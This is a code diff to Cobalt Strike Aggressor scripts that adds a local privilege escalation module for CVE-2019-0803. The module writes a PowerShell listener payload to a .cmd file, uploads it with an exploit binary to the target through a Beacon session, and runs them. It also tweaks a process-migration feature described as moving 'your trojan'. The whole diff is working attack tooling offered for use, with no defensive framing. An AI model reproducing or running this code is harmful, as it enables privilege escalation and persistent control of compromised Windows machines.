update lpe

Common.sl

@@ -20,6 +20,6 @@ sub Getname{
         $fname = $fname.rand(@array);
         $total = $total - 1;
     }
-    return $fname.".exe";
+    return $fname;
 }
 

modules/lpe.cna

@@ -129,6 +129,18 @@ sub SweetPotato {
 	beacon_link($bid, $null, $3['listener']);
 }
 
+sub cve_2019_0803{
+    btask($bid, "Task Beacon to run " . listener_describe($3['listener']) . " via cve-2019-0803");
+    local('$payload $fname');
+    $fname = Getname().".cmd";
+    $payload = powershell($3['listener'], false);
+    $handle = openf("> $+ $fname");
+    writeb($handle, $payload);
+    closef($handle);
+    bupload!($bid, script_resource("exp/0803.exe"));
+    bupload!($bid, $fname);
+    bshell!($bid,"0803.exe cmd  $+ \"$fname\"");
+}
 #append menus
 
 
@@ -196,4 +208,13 @@ sub SweetPotato {
             dbutton_action($Dialog, "Exploit");
             dialog_show($Dialog);
         }
+
+        item "CVE-2019-0803"{
+            $bid = $1['@'];
+            $Dialog = dialog("CVE-2019-0803",%(bid => $bid),&cve_2019_0803);
+            dialog_description($Dialog, "The elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'.");
+            drow_listener($Dialog, "listener", "Listener: ");
+            dbutton_action($Dialog, "Exploit");
+            dialog_show($Dialog);
+        }
     }

modules/post.cna

@@ -150,7 +150,7 @@ sub Migrate{
             item "Migrate"{
                 local('$process');
                 $bid = $1['@'];
-                $process = Getname();
+                $process = Getname().".exe";
                 $dir = Getinfo()[1];
                 $dialog = dialog("Migrate process",%(bid => $bid, dir => $dir, pname => $process, keep => "true"), &Migrate);
                 dialog_description($dialog, "Migrate your trojan to another directory and then reconnect a new session, only native sessions are supported and can only be migrated once");